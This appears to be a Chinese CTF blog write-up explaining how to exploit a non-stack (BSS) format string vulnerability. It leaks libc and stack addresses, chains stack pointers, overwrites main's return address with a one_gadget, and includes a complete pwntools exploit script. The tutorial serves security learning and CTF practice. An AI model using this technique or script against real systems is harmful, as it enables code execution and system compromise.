[CTF]PWN--非栈上格式化字符串漏洞

最新推荐文章于 2024-04-09 14:41:37 发布
最新推荐文章于 2024-04-09 14:41:37 发布
阅读量2.2k 收藏 38
点赞数 32
文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_79880752/article/details/136305740
版权

简介

一般来说,栈上的格式化字符串漏洞利用步骤是先泄露地址,包括ELF程序地址和libc地址;然后将需要改写的GOT表地址直接传到栈上,同时利用%c%n的方法改写入system或one_gadget地址,最后就是劫持流程。但是对于BSS段或是堆上格式化字符串,也就是非栈上格式化字符串漏洞,无法直接将想要改写的地址指针放置在栈上,也就没办法实现任意地址写

本文主要为大家介绍BSS段上的格式化字符串漏洞的解法

例题

开启NX,64位,动态编译,IDA分析:

简简单单,循环7次,一个read函数,一个打印函数,存在格式化字符串漏洞,没有后门

先按常规打法,泄露libc基址与ELF程序地址(栈地址)

通过调试可以得到libc_start_main函数的地址偏移与一个栈地址的地址偏移

通过格式化字符串漏洞将其泄露

由于本题是非栈上格式化字符串漏洞,因此我们无法使用工具直接修改返回地址,那就只能手搓了,还不懂如何手搓格式化字符串漏洞的朋友可以看看我上期博文:

https://blog.csdn.net/2301_79880752/article/details/136178764?spm=1001.2014.3001.5501

讲的还算详细

想要手搓格式化字符串我们得先知道我们需要修改的返回地址是哪个函数的,在本题中修改printf函数的返回地址是行不通的,因为我们要手搓格式化字符串漏洞就需要多次修改地址,需要多次用到printf函数,因此不能修改,那就只有main函数的返回地址了

调试查看一下main函数的返回地址

可以看到,图中圈出的部分即为main函数的返回地址,但是我们可以观察发现,它并不满足手搓payload中栈地址a➞地址b➞地址c,我们就没办法直接修改返回地址,那要怎么做呢?

这边博🐖教给大家一种新的解题方法,也是本篇博文的重点部分

我们可以看看栈里面是否存在栈地址a➞地址b➞地址c的结构

如果存在,我们是不是可以将栈地址c修改为main函数返回地址的栈地址

这样就形成了栈地址a➞地址b➞栈地址➞main函数返回地址的结构

我们只需要再找到地址b的偏移,就可以修改地址b中栈地址指向的main函数返回地址

也就是将main函数返回地址的栈地址,即0x7ffcd5c274e8里存的东西赋到画圈部分地址里即可

这里注意,手搓payload需要将0x7ffcd5c274e8的后二字节,中间二字节,以及最前面二个字节里存的东西全部赋值给画圈部分地址,而不单单是将两个地址不一样的后二字节修改过去就结束了,因为一个栈地址里包含了八个栈地址,并不是修改了其中一个栈地址就可以

我这边是采用了一一对应的修改方式,不容易混淆,即修改main函数返回地址的栈地址后两个字节里的内容到画圈部分地址0x7ffcd5c283e9的后二字节后,对应的修改main函数返回地址后二字节,随后再修改main函数返回地址的栈地址中间两个字节里的内容到画圈部分地址0x7ffcd5c283e9的中间二字节后,再去修改main函数对应的中间二字节,以此类推,形成一一对应的关系

最后将mian函数返回地址的所有字节全部修改成one_gadget的地址,即可获取权限

细节方面就不多讲了,具体手搓payload步骤跟博🐖的上一篇博文一样

exp:

from pwn import *
context(log_level='debug',os='linux',arch='amd64')
#p=remote("node4.buuoj.cn",29608)
libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
p=process("./pwn2")
elf=ELF("./pwn2")
def bug():
	gdb.attach(p)
	pause()
pay=b'%9$p%11$p'
bug()
p.send(pay)

p.recvuntil("0x")
libc_base=int(p.recv(12),16)-libc.sym['__libc_start_main']-243
print(hex(libc_base))

p.recvuntil("0x")
stack=int(p.recv(12),16)
print(hex(stack))

stack1=stack-240
print(hex(stack1))

stack2=stack-224
print(hex(stack2))

one=libc_base+0xe3b01
print(hex(one))

pay=(b'%'+str(stack1&0xffff).encode()+b'c%11$hn').ljust(504,b'\x00')+p64(stack2)

p.send(pay)

pay=(b'%'+str(one&0xffff).encode()+b'c%39$hn').ljust(504,b'\x00')+p64(stack)
p.send(pay)

stack1+=2
pay=(b'%'+str(stack1&0xffff).encode()+b'c%11$hn').ljust(504,b'\x00')+p64(stack2+2)
p.send(pay)

pay=(b'%'+str(one>>16&0xffff).encode()+b'c%39$hn').ljust(504,b'\x00')+p64(stack+2)
p.send(pay)

stack1+=2
pay=(b'%'+str(stack1&0xffff).encode()+b'c%11$hn').ljust(504,b'\x00')+p64(stack2+4)
p.send(pay)

pay=(b'%'+str(one>>32).encode()+b'c%39$hn').ljust(504,b'\x00')+p64(stack+4)
p.send(pay)

p.interactive()

D0.
关注
PWN系列】格式化字符串在bss段上的处理
Vicl1fe的博客
10-19 1501
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 参考网址: http://www.starssgo.top/2019/12/06/%E6%A0%BC%E5%BC%8F%E5%8C%96%E5%AD%97%E7%AC%A6%E4%B8%B2%E5%9C%A8bss%E6%AE%B5%E7%9A%84%E5%A4%84%E7%90%86/ 第一次遇到这种题,想写wp记录一下,但确实不知道该怎么写才通俗易懂,最后还是感觉结合exp一步一步调试应该会更通俗易懂。 题目分析 开启
pwn中的初级格式化字符串漏洞
wangxunyu6的博客
03-02 1025
onegadget fmt
非栈上的格式化字符串利用例题讲解
fzucaicai的博客
03-06 776
具体来说,就是用%n,把如图的0x7fffffffdda0所指向的0x7fffffffddb0改成0xfffffffdd98,这样的话,我们用%n作用在第八个参数就可以修改第七个参数所储存的内容了!%n 和 %s一样,都是类似于指针的东西,比如我对第7个参数进行%n ,那么实际上修改的并不是第七个参数里的数据,而是把第七个参数里存的数据当成。改got只能一次成型,因为如果分多次,导致printf的got表改变,就不会再执行pirntf函数了,因此需要一次性修改,否则将会失败。,然后修改指针指向的对应内容。
非栈上的格式化字符串漏洞利用
qq_52877079的博客
03-25 400
对于常规的栈上格式化字符串漏洞,可以直接构造(%c %n 指针)的方式来实现任意地址写,但是对于非栈上变量来说,就无法直接给出目的地址的指针,因为printf的参数保存在寄存器和栈上面。对于非栈上变量,格式化字符串漏洞依然存在,可以考虑借助已有的栈上指针来实现间接地利用。
非栈上的格式化字符串漏洞
Grxer的博客
03-20 819
利用1处栈地址,也就是将0xffffcfa8地址处内容0xffffcfb8修改为0xffffcfac,由于开启pie保护,0xffffcfac处所存内容是elf文件所存地址+pie基址生成的,got表也在elf文件的数据区,也是有地址+pie基地址生成,所以我们只需要利用%$hn修改其低四位即可(小端序),buf地址可以利用%$p泄露,这样我们就可以输入buf为printf_got+payload,修改其got为system地址。(目标文件该节在磁盘不占空间,在运行时,内存分配,初始化0))
非栈格式化字符串漏洞
2302_79813730的博客
02-21 973
如图,红色框为a-b-c,我们可以利用格式化字符串漏洞更改c为蓝色框的第一个地址,这样我们就得到a-b-c-d,有这个我们一定可以找到b-c-d,这样我们就可以把d改成one_gadget的地址,d正好是main函数的返回地址,我们一般修改的也是这个。但这样实际是行不通的,通过调试我们可以看到三次更改的都是尾字节,为什么呢,原因就在于非栈上,每一次更改都要有对应的返回地址,这是第一次的,第二次要修改的是中间两字节,在原本基础上+2就可以了,第三次原理相似(想学堆上的可以自己去搜索,我目前也没学到。
不满6位补零 字符串_非栈格式化字符串漏洞利用技巧
weixin_39617669的博客
12-25 266
0x00前言关于Linux栈上格式化字符串漏洞的利用网上已经有许多讲解了,但是非栈上的格式化字符串漏洞很少有人介绍。这里主要以上周末SUCTF比赛中playfmt题目为例,详细介绍一下bss段上或堆上的格式化字符串利用技巧。0x01基础知识点格式化字符串漏洞的具体原理就不再详细叙述,这里主要简单介绍一下格式化参数位置的计算和漏洞利用时常用的格式字符。参数位置计算linux下32位程序是栈传参,从左...
xman_2019_format(非栈格式化字符串仅一次利用的爆破)
seaaseesa的博客
04-30 1512
xman_2019_format 首先检查一下程序的保护机制 然后用IDA分析一下 存在一个后门函数 s执行的内存是非栈上,这类格式化字符串漏洞,一般需要先泄露栈地址,但是这里无法做到,如果泄露了,第二次也没机会来再次利用了。因为这里是一次输入,分步执行。没有循环的交互。因此,最简单的方法是爆破栈的低1字节。通过栈上已有的数据,在栈上布下一个指向函数返回地址栈的指针,然后劫持返回地...
BUU_SWPUCTF_2019_login非栈格式化字符串
qq_70452545的博客
04-21 256
对于栈上的格式化字符串可以通过直接将对应地址写入栈中,然后利用三链对任意写入地址修改,非栈上也就是不能直接写入,利用格式化字符串一样可以修改,只是要麻烦一点。
CTF pwn题之格式化字符串漏洞详解
热门推荐
lifanxin的博客
03-22 1万+
FmtStr格式化字符串类概念求偏移和任意地址写求偏移任意地址写一个例子程序分析漏洞利用wp总结 概念 在遇到pwn题中格式化字符串漏洞时,我们一般会分两大步实现漏洞利用:首先构造一个payload来寻找输入字符串到栈顶指针的偏移,然后利用偏移实现对目标地址的改写。下面我将介绍pwntools中的FmtStr类如何实现偏移的求解以及对目标地址的改写。 求偏移和任意地址写 求偏移 在格式化字符串漏洞利用中,我们一般都是这样手动构造payload进行偏移求解的,如下图所示,开头输入方便定位的字符串aaaa,然后
BUUCTF-PWN刷题记录-18(格式化字符串漏洞
weixin_44145820的博客
05-08 1771
目录xman_2019_format(字符串位于堆上)hitcontraining_playfmt(字符串位于bss)wustctf2020_babyfmt xman_2019_format(字符串位于堆上) 一道格式化字符串题目,但是只有一次输入机会,但是有多次利用机会,每次利用使用‘|’隔开 我们先看一下栈的情况 经过多次调试,可以发现返回地址最低一个16进制位一定为0xC,我们只需要爆破倒数第二个16进制位就能得到指向返回地址的栈上地址 Exp: from pwn import * #r =
pwn-格式化字符串漏洞
admin的博客
10-09 368
部分基础知识来自于CTF-wiki。 原理介绍 - CTF Wiki (ctf-wiki.org) 常见的有格式化字符串函数有 输入 scanf 输出 函数 基本介绍 printf 输出到 stdout fprintf 输出到指定 FILE 流 vprintf 根据参数列表格式化输出到 stdout vfprintf 根据参数列表格式化输出到指定 FILE 流 sprintf 输出到字符串 snprintf 输出指定字节数..
跟着CTF-Wiki学pwn|格式化字符串(1)
Kni9hT's Blog
05-19 2220
文章目录格式化字符串漏洞原理介绍格式化字符串函数介绍格式化字符串函数格式化字符串参数格式化字符串漏洞原理格式化字符串漏洞利用程序崩溃泄露内存泄露栈内存获取栈变量数值获取栈变量对应字符串泄露任意地址内存覆盖内存覆盖栈内存确定覆盖地址确定相对偏移进行覆盖覆盖任意地址内存覆盖小数字覆盖大数字 格式化字符串漏洞原理介绍 首先,对格式化字符串漏洞的原理进行简单介绍。 格式化字符串函数介绍 格式化字符串函数可以接受可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后的参数。通俗来说,格式化字符串函数就是将计
【逆向学习记录】格式化字符串漏洞原理及其利用
卦星的专栏
02-12 1224
1.概述 前面学习完成栈溢出的漏洞利用,接下来最长用到的就是格式化字符串了,由于懒散,春节之前耽误的很多时间,这里统一整理一下 学习的过程中,主要参考文章: 格式化字符串利用小结 CTF WIKI 格式化字符串漏洞利用 2.关键知识点 引用参考文件的内容 %c:输出字符,配上%n可用于向指定地址写数据。 %d:输出十进制整数,配上%n可用于向指定地址写数据。 %x:输出16进制数据,如%i$x表示...
手搓payload+非栈格式化字符串
2301_79880074的博客
02-22 1209
格式化字符串漏洞类型题中我们可以利用payload = fmtstr_payload(offset,{printf_got:system_plt})这个工具去修改地址,但是这个工具产生的字节数是很大的,有时候我们是无法去正常利用的,我们需要去自己构造payload修改地址。
格式化字符串漏洞归纳
yongbaoii的博客
11-26 1037
00
格式化字符串漏洞原理及其利用(附带pwn例题讲解)
最新发布
WdIg-2023的博客
04-09 3995
格式化字符串漏洞在实际利用过程中现在几乎挖掘不到了,但是在CTFpwn题中,由于其可以结合其他溢出漏洞利用,还是经常会遇到格式化字符串漏洞的。在我们初识C语言的时候,我们经常会使用到printf这之类的函数,printf函数的第一个参数就是一个格式化字符串,就是程序员可以使用占位符,指定格式,这些占位符用来替代后面的变量或者是数据。简单总结就是说,我们可以在一个字符串中,执行某个位置应该输出怎么样的数据,使用占位符代替,在输出的时候函数会自动按照我们指定的格式,寻找参数并以我们预想的形式输出。
格式化字符串格式化字符串漏洞的原理与利用
qcwwww的博客
07-11 1002
格式化字符串格式化字符串漏洞的原理与利用
pwn学习】格式化字符漏洞
Morphy_Amo的博客
12-29 6176
文章目录什么是格式化字符漏洞格式化字符串函数格式化字符串利用泄露内存例题 利用格式化字符串漏洞获取libc基址覆盖内存栈地址覆盖小数覆盖大数覆盖轮子 什么是格式化字符漏洞 格式化字符串函数可以接受可变数量的参数,并将第一个参数作为格式化字符串,根据其来解析之后的参数。通俗来说,格式化字符串函数就是将计算机内存中表示的数据转化为我们人类可读的字符串格式。几乎所有的 C/C++ 程序都会利用格式化字符串函数来输出信息,调试程序,或者处理字符串。一般来说,格式化字符串在利用的时候主要分为三个部分。 格式化字符串
ctf pwn怎么出题
05-05
CTF PWN出题需要一定的经验和技能,以下是一些建议: 1.熟悉漏洞类型和常见漏洞,如堆溢出、栈溢出、格式化字符串漏洞等。 2.了解各种编程语言和操作系统的底层实现和机制,如内存分配、系统调用等。 3.学习各种反调试和反逆向技术,以防止参赛者使用调试器或反汇编工具。 4.思考如何设计一个有趣的场景和情节,以及如何将漏洞和场景结合起来。 5.平衡难度和可玩性,确保出题的难度适中,不至于太难或太简单。 6.测试和调试题目,以确保题目没有明显的错误和漏洞。 7.与其他出题人交流和分享经验,以提高自己的出题水平。
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值